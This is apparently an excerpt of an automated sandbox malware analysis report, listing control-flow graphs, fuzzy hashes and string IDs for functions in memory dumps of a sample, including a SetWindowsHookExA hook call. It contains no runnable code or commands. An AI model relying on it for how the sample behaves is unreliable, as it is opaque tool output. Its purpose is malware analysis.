1c482f-1c4833 3339->3344 3340->3339 3342 1c4821 3340->3342 3341->3337 3342->3339 3346 1c4851-1c4855 3343->3346 3347 1c4843-1c4847 3343->3347 3344->3343 3345 1c4835 3344->3345 3345->3343 3349 1c4865 3346->3349 3350 1c4857-1c485b 3346->3350 3347->3346 3348 1c4849-1c484c call 1c0ab8 3347->3348 3348->3346 3353 1c4866 3349->3353 3350->3349 3352 1c485d-1c4860 call 1c0ab8 3350->3352 3352->3349 3353->3353
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af975b69bb32246445b60b9a66f9f473b7b4f4ddd90851bf7123b1b1a58fb21b
                                                          • Instruction ID: f2bca7acb9a53fdb0090347e58f3a5987d9ce1c2198e57af181985f1ad43da19
                                                          • Opcode Fuzzy Hash: af975b69bb32246445b60b9a66f9f473b7b4f4ddd90851bf7123b1b1a58fb21b
                                                          • Instruction Fuzzy Hash: 36B17A70E04259CFDF10CFA8C8A5BADBBF2AF99314F14852DD815AB294EB74D845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C3900 Relevance: .2, Instructions: 238COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3355 1c3900-1c3966 3357 1c3968-1c3973 3355->3357 3358 1c39b0-1c39b2 3355->3358 3357->3358 3359 1c3975-1c3981 3357->3359 3360 1c39b4-1c3a0c 3358->3360 3361 1c39a4-1c39ae 3359->3361 3362 1c3983-1c398d 3359->3362 3369 1c3a0e-1c3a19 3360->3369 3370 1c3a56-1c3a58 3360->3370 3361->3360 3363 1c398f 3362->3363 3364 1c3991-1c39a0 3362->3364 3363->3364 3364->3364 3366 1c39a2 3364->3366 3366->3361 3369->3370 3372 1c3a1b-1c3a27 3369->3372 3371 1c3a5a-1c3a72 3370->3371 3379 1c3abc-1c3abe 3371->3379 3380 1c3a74-1c3a7f 3371->3380 3373 1c3a29-1c3a33 3372->3373 3374 1c3a4a-1c3a54 3372->3374 3375 1c3a35 3373->3375 3376 1c3a37-1c3a46 3373->3376 3374->3371 3375->3376 3376->3376 3378 1c3a48 3376->3378 3378->3374 3381 1c3ac0-1c3b0e 3379->3381 3380->3379 3382 1c3a81-1c3a8d 3380->3382 3390 1c3b14-1c3b22 3381->3390 3383 1c3a8f-1c3a99 3382->3383 3384 1c3ab0-1c3aba 3382->3384 3386 1c3a9d-1c3aac 3383->3386 3387 1c3a9b 3383->3387 3384->3381 3386->3386 3388 1c3aae 3386->3388 3387->3386 3388->3384 3391 1c3b2b-1c3b8b 3390->3391 3392 1c3b24-1c3b2a 3390->3392 3399 1c3b8d-1c3b91 3391->3399 3400 1c3b9b-1c3b9f 3391->3400 3392->3391 3399->3400 3401 1c3b93 3399->3401 3402 1c3baf-1c3bb3 3400->3402 3403 1c3ba1-1c3ba5 3400->3403 3401->3400 3405 1c3bb5-1c3bb9 3402->3405 3406 1c3bc3-1c3bc7 3402->3406 3403->3402 3404 1c3ba7-1c3baa call 1c0ab8 3403->3404 3404->3402 3405->3406 3410 1c3bbb-1c3bbe call 1c0ab8 3405->3410 3407 1c3bc9-1c3bcd 3406->3407 3408 1c3bd7-1c3bdb 3406->3408 3407->3408 3411 1c3bcf-1c3bd2 call 1c0ab8 3407->3411 3412 1c3bdd-1c3be1 3408->3412 3413 1c3beb-1c3bef 3408->3413 3410->3406 3411->3408 3412->3413 3416 1c3be3 3412->3416 3417 1c3bff 3413->3417 3418 1c3bf1-1c3bf5 3413->3418 3416->3413 3420 1c3c00 3417->3420 3418->3417 3419 1c3bf7 3418->3419 3419->3417 3420->3420
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5083923d39086bbf0388808567be1a5fa2c3a3a4ffe9aa2933d754fd9a1ee955
                                                          • Instruction ID: 2c640c78d9bf8fa237530adcc94b25364a8a12a1f2547b6688abe5a12c65770c
                                                          • Opcode Fuzzy Hash: 5083923d39086bbf0388808567be1a5fa2c3a3a4ffe9aa2933d754fd9a1ee955
                                                          • Instruction Fuzzy Hash: F2913670E002099FDF14CFA9C885BADBBF2AF98314F14C52DE425AB294EB74D945CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CE3BD Relevance: 2.6, Strings: 2, Instructions: 110COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1555 1ce3bd-1ce3eb 1556 1ce3ed-1ce3f0 1555->1556 1557 1ce3f2-1ce40e 1556->1557 1558 1ce413-1ce415 1556->1558 1557->1558 1559 1ce41c-1ce41f 1558->1559 1560 1ce417 1558->1560 1559->1556 1562 1ce421-1ce447 1559->1562 1560->1559 1567 1ce44e-1ce47c 1562->1567 1572 1ce47e-1ce488 1567->1572 1573 1ce4f3-1ce517 1567->1573 1577 1ce48a-1ce490 1572->1577 1578 1ce4a0-1ce4f1 1572->1578 1579 1ce519 1573->1579 1580 1ce521 1573->1580 1581 1ce494-1ce496 1577->1581 1582 1ce492 1577->1582 1578->1572 1578->1573 1579->1580 1581->1578 1582->1578
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$PHp
                                                          • API String ID: 0-3392928801
                                                          • Opcode ID: 042c5de6120c5e54d9a18138cdebddac5cc8cc59f0acd508932bc4bf44da525a
                                                          • Instruction ID: 2f93ecf6126d0c653fe1418ad0c26086fbf9cbf77e10f2a6b2653faee03c5424
                                                          • Opcode Fuzzy Hash: 042c5de6120c5e54d9a18138cdebddac5cc8cc59f0acd508932bc4bf44da525a
                                                          • Instruction Fuzzy Hash: AD410E30B002418FCB1AAB34D859B6E3BE3AF99354B64882CE002DB395EF35CD06C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C6590 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2291 1c6590-1c65cf 2295 1c65d1-1c65d4 2291->2295 2296 1c65d6-1c65fc 2295->2296 2297 1c6601-1c6604 2295->2297 2296->2297 2298 1c6606-1c662c 2297->2298 2299 1c6631-1c6634 2297->2299 2298->2299 2300 1c6636-1c665c 2299->2300 2301 1c6661-1c6664 2299->2301 2300->2301 2303 1c6666 2301->2303 2304 1c6671-1c6674 2301->2304 2310 1c666c 2303->2310 2306 1c6676-1c669c 2304->2306 2307 1c66a1-1c66a4 2304->2307 2306->2307 2312 1c66a6-1c66cc 2307->2312 2313 1c66d1-1c66d4 2307->2313 2310->2304 2312->2313 2315 1c66d6-1c66ec 2313->2315 2316 1c66f1-1c66f4 2313->2316 2315->2316 2321 1c66f6-1c671c 2316->2321 2322 1c6721-1c6724 2316->2322 2321->2322 2324 1c6726-1c674c 2322->2324 2325 1c6751-1c6754 2322->2325 2324->2325 2329 1c6756-1c677c 2325->2329 2330 1c6781-1c6784 2325->2330 2329->2330 2332 1c6795-1c6798 2330->2332 2333 1c6786-1c6788 2330->2333 2339 1c679a-1c67c0 2332->2339 2340 1c67c5-1c67c8 2332->2340 2508 1c678a call 1c7e10 2333->2508 2509 1c678a call 1c7e01 2333->2509 2510 1c678a call 1c7eb3 2333->2510 2339->2340 2342 1c67ca-1c67f0 2340->2342 2343 1c67f5-1c67f8 2340->2343 2342->2343 2348 1c67fa-1c6820 2343->2348 2349 1c6825-1c6828 2343->2349 2344 1c6790 2344->2332 2348->2349 2351 1c682a-1c6850 2349->2351 2352 1c6855-1c6858 2349->2352 2351->2352 2356 1c685a-1c6880 2352->2356 2357 1c6885-1c6888 2352->2357 2356->2357 2360 1c688a-1c68b0 2357->2360 2361 1c68b5-1c68b8 2357->2361 2360->2361 2364 1c68ba-1c68e0 2361->2364 2365 1c68e5-1c68e8 2361->2365 2364->2365 2369 1c68ea-1c6910 2365->2369 2370 1c6915-1c6918 2365->2370 2369->2370 2374 1c691a-1c6940 2370->2374 2375 1c6945-1c6948 2370->2375 2374->2375 2379 1c694a-1c6970 2375->2379 2380 1c6975-1c6978 2375->2380 2379->2380 2384 1c697a-1c69a0 2380->2384 2385 1c69a5-1c69a8 2380->2385 2384->2385 2389 1c69aa-1c69d0 2385->2389 2390 1c69d5-1c69d8 2385->2390 2389->2390 2394 1c69da-1c6a00 2390->2394 2395 1c6a05-1c6a08 2390->2395 2394->2395 2399 1c6a0a-1c6a30 2395->2399 2400 1c6a35-1c6a38 2395->2400 2399->2400 2404 1c6a3a-1c6a60 2400->2404 2405 1c6a65-1c6a68 2400->2405 2404->2405 2409 1c6a6a-1c6a90 2405->2409 2410 1c6a95-1c6a98 2405->2410 2409->2410 2414 1c6a9a-1c6ac0 2410->2414 2415 1c6ac5-1c6ac8 2410->2415 2414->2415 2419 1c6aca-1c6af0 2415->2419 2420 1c6af5-1c6af8 2415->2420 2419->2420 2424 1c6afa-1c6b20 2420->2424 2425 1c6b25-1c6b28 2420->2425 2424->2425 2429 1c6b2a-1c6b50 2425->2429 2430 1c6b55-1c6b58 2425->2430 2429->2430 2434 1c6b5a-1c6b80 2430->2434 2435 1c6b85-1c6b88 2430->2435 2434->2435 2439 1c6b8a-1c6bb0 2435->2439 2440 1c6bb5-1c6bb8 2435->2440 2439->2440 2444 1c6bba-1c6be0 2440->2444 2445 1c6be5-1c6be8 2440->2445 2444->2445 2449 1c6bea-1c6c10 2445->2449 2450 1c6c15-1c6c18 2445->2450 2449->2450 2454 1c6c1a-1c6c40 2450->2454 2455 1c6c45-1c6c48 2450->2455 2454->2455 2459 1c6c4a-1c6c70 2455->2459 2460 1c6c75-1c6c78 2455->2460 2459->2460 2464 1c6c7a-1c6ca0 2460->2464 2465 1c6ca5-1c6ca8 2460->2465 2464->2465 2469 1c6caa-1c6cd0 2465->2469 2470 1c6cd5-1c6cd8 2465->2470 2469->2470 2474 1c6cda-1c6d00 2470->2474 2475 1c6d05-1c6d08 2470->2475 2474->2475 2479 1c6d0a-1c6d30 2475->2479 2480 1c6d35-1c6d38 2475->2480 2479->2480 2484 1c6d3a-1c6d4e 2480->2484 2485 1c6d53-1c6d56 2480->2485 2484->2485 2492 1c6d58-1c6d7e 2485->2492 2493 1c6d83-1c6d85 2485->2493 2492->2493 2494 1c6d8c-1c6d8f 2493->2494 2495 1c6d87 2493->2495 2494->2295 2502 1c6d95-1c6d9b 2494->2502 2495->2494 2508->2344 2509->2344 2510->2344
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0L
                                                          • API String ID: 0-1588582835
                                                          • Opcode ID: 3ae2dd185dd0560502bcc0b50343e74ff97ad7192778be7224ec479214a7aa43
                                                          • Instruction ID: bac63bd48d94000415cd505205252bf092f830894cd9469b871efba897fddf0a
                                                          • Opcode Fuzzy Hash: 3ae2dd185dd0560502bcc0b50343e74ff97ad7192778be7224ec479214a7aa43
                                                          • Instruction Fuzzy Hash: 96221774700306DBCB16AB28E855B2D36A2FB95344B60893DF00ADB355DF35EC8A8BC5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B9FF8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2511 4b9ff8-4ba042 2513 4ba04e-4ba080 SetWindowsHookExA 2511->2513 2514 4ba044-4ba04c 2511->2514 2515 4ba089-4ba0a9 2513->2515 2516 4ba082-4ba088 2513->2516 2514->2513 2516->2515
                                                          APIs
                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 004BA073
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.626048954.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_4b0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: 7221c69bd7ed1f6ce23f2dce5db43412879f27871ad6f5808383dd10a6608597
                                                          • Instruction ID: f14f0ffecceb102268db8af7da217be7ae3f650679d01763a74517fc1512bab7
                                                          • Opcode Fuzzy Hash: 7221c69bd7ed1f6ce23f2dce5db43412879f27871ad6f5808383dd10a6608597
                                                          • Instruction Fuzzy Hash: 7A21F4B5D002099FCB14DF9AD844BEEFBF5FB88310F14842AD419A7250C779A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C5088 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2520 1c5088-1c50a0 2521 1c50a2-1c50a5 2520->2521 2522 1c50b4-1c50b7 2521->2522 2523 1c50a7-1c50ad 2521->2523 2524 1c50ee-1c50f1 2522->2524 2525 1c50b9-1c50c0 2522->2525 2523->2525 2526 1c50af 2523->2526 2524->2523 2529 1c50f3-1c50f6 2524->2529 2527 1c50c7-1c50e7 2525->2527 2528 1c50c2-1c50c6 2525->2528 2526->2522 2530 1c512c-1c512f 2527->2530 2531 1c50e9 2527->2531 2528->2527 2532 1c511d-1c5120 2529->2532 2533 1c50f8-1c5118 2529->2533 2534 1c51fa-1c5224 2530->2534 2535 1c5135-1c515b 2530->2535 2531->2524 2536 1c5127-1c512a 2532->2536 2537 1c5122-1c5124 2532->2537 2533->2532 2544 1c5226-1c5228 2534->2544 2538 1c5160-1c5163 2535->2538 2536->2530 2536->2538 2537->2536 2542 1c517a-1c517d 2538->2542 2543 1c5165-1c5175 2538->2543 2546 1c517f-1c5180 2542->2546 2547 1c5185-1c5188 2542->2547 2543->2542 2551 1c522f-1c5232 2544->2551 2552 1c522a 2544->2552 2546->2547 2548 1c518a-1c519e 2547->2548 2549 1c51bb-1c51bd 2547->2549 2561 1c51a4 2548->2561 2562 1c51a0-1c51a2 2548->2562 2554 1c51bf 2549->2554 2555 1c51c4-1c51c7 2549->2555 2551->2544 2556 1c5234-1c5241 2551->2556 2552->2551 2554->2555 2555->2521 2560 1c51cd-1c51eb 2555->2560 2566 1c5259-1c52cf call 1c4acc call 1c4adc call 1c4aec 2556->2566 2567 1c5243-1c5249 2556->2567 2576 1c51f2-1c51f9 2560->2576 2564 1c51a7-1c51b6 2561->2564 2562->2564 2564->2549 2586 1c52d1-1c52da 2566->2586 2587 1c52f2 2566->2587 2568 1c524d-1c524f 2567->2568 2569 1c524b 2567->2569 2568->2566 2569->2566 2588 1c52dc-1c52df 2586->2588 2589 1c52e1-1c52ee 2586->2589 2590 1c52f5-1c530c 2587->2590 2591 1c52f0 2588->2591 2589->2591 2595 1c530e-1c5336 call 1c0b34 2590->2595 2596 1c5366-1c539b 2590->2596 2591->2590 2605 1c533c-1c5358 2595->2605 2598 1c539d 2596->2598 2599 1c53a6 2596->2599 2598->2599 2601 1c53a7 2599->2601 2601->2601 2607 1c535a 2605->2607 2608 1c5363 2605->2608 2607->2608 2608->2596
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: 7c8d1eea37d7a7e06d027594ad6c5f4691b67e40c7389a7f589ee5678d9397b5
                                                          • Instruction ID: 72dbf4feb9d9a934bf2d8774b7c89e7cb5e613a8de9690c37f8055f4bb4f1c9c
                                                          • Opcode Fuzzy Hash: 7c8d1eea37d7a7e06d027594ad6c5f4691b67e40c7389a7f589ee5678d9397b5
                                                          • Instruction Fuzzy Hash: 26915934B10615CFCB14DB68D898BAE7BB2BF98710F244569E406DB3A1DB75EC81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C5BF7 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2648 1c5bf7-1c5bfc 2649 1c5c5c 2648->2649 2650 1c5bfe-1c5c3c 2648->2650 2651 1c5c60-1c5c6f 2649->2651 2663 1c5c3e-1c5c41 2650->2663 2654 1c5c74-1c5c77 2651->2654 2656 1c5c79-1c5c80 2654->2656 2657 1c5c8b-1c5c8e 2654->2657 2658 1c5d9b-1c5da1 2656->2658 2659 1c5c86 2656->2659 2660 1c5c9e-1c5ca1 2657->2660 2661 1c5c90 call 1c6590 2657->2661 2659->2657 2664 1c5cdd-1c5cdf 2660->2664 2665 1c5ca3-1c5cd8 2660->2665 2666 1c5c96-1c5c99 2661->2666 2663->2654 2667 1c5c43-1c5c57 2663->2667 2668 1c5ce6-1c5ce9 2664->2668 2669 1c5ce1 2664->2669 2665->2664 2666->2660 2673 1c5c5d 2667->2673 2674 1c5c59-1c5c5b 2667->2674 2668->2663 2670 1c5cef-1c5cfe 2668->2670 2669->2668 2675 1c5d28-1c5d3e 2670->2675 2676 1c5d00-1c5d26 2670->2676 2673->2651 2674->2651 2675->2658 2676->2675
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: fc8b8457c8ecf5705fa498d930c088724de369422ead5a0e97befe0028f0e94e
                                                          • Instruction ID: ff001d4a0788bc5a106e41d147a3c98c849d77b62b8be2aac65699341ecb977b
                                                          • Opcode Fuzzy Hash: fc8b8457c8ecf5705fa498d930c088724de369422ead5a0e97befe0028f0e94e
                                                          • Instruction Fuzzy Hash: FB41B170E00B098BDB15CFA4D894BAEB7B2EF65304F65446AE406EB251EB70EC85CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C5C28 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2683 1c5c28-1c5c3c 2684 1c5c3e-1c5c41 2683->2684 2685 1c5c74-1c5c77 2684->2685 2686 1c5c43-1c5c57 2684->2686 2687 1c5c79-1c5c80 2685->2687 2688 1c5c8b-1c5c8e 2685->2688 2696 1c5c5d 2686->2696 2697 1c5c59-1c5c5b 2686->2697 2689 1c5d9b-1c5da1 2687->2689 2690 1c5c86 2687->2690 2691 1c5c9e-1c5ca1 2688->2691 2692 1c5c90 call 1c6590 2688->2692 2690->2688 2694 1c5cdd-1c5cdf 2691->2694 2695 1c5ca3-1c5cd8 2691->2695 2698 1c5c96-1c5c99 2692->2698 2700 1c5ce6-1c5ce9 2694->2700 2701 1c5ce1 2694->2701 2695->2694 2699 1c5c60-1c5c6f 2696->2699 2697->2699 2698->2691 2699->2685 2700->2684 2702 1c5cef-1c5cfe 2700->2702 2701->2700 2705 1c5d28-1c5d3e 2702->2705 2706 1c5d00-1c5d26 2702->2706 2705->2689 2706->2705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: 2ecfbd4fad8df764d8b6b575f0f8bd8c3a6ef3d2eee9302044a165289ed4af0c
                                                          • Instruction ID: 2e04bd47651062677af2f9b978b968eb6fc59e6dafb59021d34fa721299c8efb
                                                          • Opcode Fuzzy Hash: 2ecfbd4fad8df764d8b6b575f0f8bd8c3a6ef3d2eee9302044a165289ed4af0c
                                                          • Instruction Fuzzy Hash: C1317070E00709DBDB14CFA5D484BAEB7B6EF95310F208529E806EB240EB71ED81CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8028 Relevance: .4, Instructions: 355COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3136 1c8028-1c8047 3137 1c8049-1c804c 3136->3137 3138 1c804e-1c8053 3137->3138 3139 1c8056-1c8059 3137->3139 3138->3139 3140 1c835e-1c8367 3139->3140 3141 1c805f-1c8062 3139->3141 3144 1c836d-1c8377 3140->3144 3145 1c80d8-1c80e1 3140->3145 3142 1c8064-1c8080 3141->3142 3143 1c8085-1c8088 3141->3143 3142->3143 3148 1c80bd-1c80c0 3143->3148 3149 1c808a-1c80b8 3143->3149 3146 1c837a-1c83aa 3145->3146 3147 1c80e7-1c80ee 3145->3147 3161 1c83ac-1c83af 3146->3161 3151 1c80f3-1c80f6 3147->3151 3152 1c80c2 3148->3152 3153 1c80d3-1c80d6 3148->3153 3149->3148 3154 1c80f8-1c8107 3151->3154 3155 1c8112-1c8114 3151->3155 3273 1c80c5 call 1c833e 3152->3273 3274 1c80c5 call 1c8028 3152->3274 3275 1c80c5 call 1c8388 3152->3275 3276 1c80c5 call 1c8140 3152->3276 3277 1c80c5 call 1c8390 3152->3277 3153->3145 3153->3151 3168 1c810d 3154->3168 3169 1c835b 3154->3169 3159 1c811b-1c811e 3155->3159 3160 1c8116 3155->3160 3159->3137 3164 1c8124-1c814c call 1c8960 3159->3164 3160->3159 3166 1c8534-1c853e 3161->3166 3167 1c83b5-1c83b8 3161->3167 3162 1c80cb-1c80ce 3162->3153 3278 1c814f call 1cbe88 3164->3278 3279 1c814f call 1cbf50 3164->3279 3170 1c83ba-1c83c8 3167->3170 3171 1c83d3-1c83d6 3167->3171 3168->3155 3169->3140 3182 1c83ce 3170->3182 3183 1c8489-1c84ab 3170->3183 3172 1c83e8-1c83eb 3171->3172 3173 1c83d8 3171->3173 3175 1c83ed-1c8405 3172->3175 3176 1c8410-1c8413 3172->3176 3178 1c83e0-1c83e3 3173->3178 3192 1c851a-1c851d 3175->3192 3193 1c840b 3175->3193 3179 1c8415-1c842e 3176->3179 3180 1c8433-1c8436 3176->3180 3178->3172 3179->3180 3184 1c8438-1c843b 3180->3184 3185 1c8457-1c8460 3180->3185 3182->3171 3188 1c843d-1c8440 3184->3188 3189 1c8445-1c8448 3184->3189 3190 1c846c-1c8475 3185->3190 3191 1c8462 3185->3191 3188->3189 3197 1c844a-1c844f 3189->3197 3198 1c8452-1c8455 3189->3198 3200 1c853f-1c8553 3190->3200 3201 1c847b-1c847f 3190->3201 3199 1c8467-1c846a 3191->3199 3202 1c8522-1c8524 3192->3202 3193->3176 3196 1c8155-1c8157 3196->3169 3203 1c815d-1c816b 3196->3203 3197->3198 3198->3185 3198->3199 3199->3190 3204 1c8484-1c8487 3199->3204 3201->3204 3205 1c852b-1c852e 3202->3205 3206 1c8526 3202->3206 3203->3169 3214 1c8171-1c81ce 3203->3214 3204->3183 3210 1c84ac-1c84af 3204->3210 3205->3161 3205->3166 3206->3205 3212 1c84ce-1c84d1 3210->3212 3213 1c84b1-1c84c9 3210->3213 3215 1c84f0-1c84f3 3212->3215 3216 1c84d3-1c84eb 3212->3216 3213->3212 3230 1c829f-1c82b9 3214->3230 3231 1c81d4-1c8227 3214->3231 3217 1c8515-1c8518 3215->3217 3218 1c84f5-1c8510 3215->3218 3216->3215 3217->3192 3217->3202 3218->3217 3236 1c82bb-1c82bf 3230->3236 3250 1c8229-1c8245 3231->3250 3251 1c8247-1c826a call 1c0d10 3231->3251 3238 1c82d0 3236->3238 3239 1c82c1-1c82ce 3236->3239 3240 1c82d5-1c82d7 3238->3240 3239->3240 3242 1c82d9-1c82db 3240->3242 3243 1c8343-1c8355 3240->3243 3244 1c82dd-1c82e7 3242->3244 3245 1c82e9 3242->3245 3243->3169 3243->3214 3246 1c82ee-1c82f0 3244->3246 3245->3246 3246->3243 3249 1c82f2-1c82f4 3246->3249 3249->3243 3252 1c82f6-1c833c 3249->3252 3262 1c826c-1c829d 3250->3262 3251->3262 3252->3243 3262->3236 3273->3162 3274->3162 3275->3162 3276->3162 3277->3162 3278->3196 3279->3196
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5cefff338bb68efe1d48d18ddf68c99d9ff98cfb474a35b7022b8bea11c5ffb
                                                          • Instruction ID: 9b2ce32723dddc482b127afd51509434d901be1de99038e0212f9924b79d5ffc
                                                          • Opcode Fuzzy Hash: c5cefff338bb68efe1d48d18ddf68c99d9ff98cfb474a35b7022b8bea11c5ffb
                                                          • Instruction Fuzzy Hash: D3D15D34A002059FCB14DBA8D894FADBBB2EF99310F248469E806D73A5DF35ED45CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8960 Relevance: .2, Instructions: 219COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25f3ab59d8d8dbb7402c21290dca2c2dd2d0669f12b0dd0bedd1fa053ec934ca
                                                          • Instruction ID: 2a16881264f401f63f7652662210ddfef4480fb64fae5b2704d5eb887531d7ba
                                                          • Opcode Fuzzy Hash: 25f3ab59d8d8dbb7402c21290dca2c2dd2d0669f12b0dd0bedd1fa053ec934ca
                                                          • Instruction Fuzzy Hash: 88817D71A002048FDB14DF68D894B9DBBB1FF98310F14C5AAE909AB396EB71DC45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C4290 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7087993dc6db782151becfaf5a3759ce28e07339bce24f98aa13cea242db953
                                                          • Instruction ID: 7ac20edb520e3a5c9e4971e8d44ac6aeb8f42102c471e4017922bee87e790e57
                                                          • Opcode Fuzzy Hash: c7087993dc6db782151becfaf5a3759ce28e07339bce24f98aa13cea242db953
                                                          • Instruction Fuzzy Hash: 26715970E04259CFDB14CFA9C895BAEBBF2BF98314F24852DE414AB294DB74D845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8390 Relevance: .1, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1fdc2f1bbff64b6108af55c5bb3bc034b2acf9e22862631c642e07f602e7f1e
                                                          • Instruction ID: 8b7fb06f3b6e464e24c8bf440241547f8f45a8a73042c4d5406a5a4ae4581308
                                                          • Opcode Fuzzy Hash: e1fdc2f1bbff64b6108af55c5bb3bc034b2acf9e22862631c642e07f602e7f1e
                                                          • Instruction Fuzzy Hash: 8241B234B002068FDF259BA8D4D4B7EB7A6EBA5310F64886ED509DB341DF35DC868782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8388 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
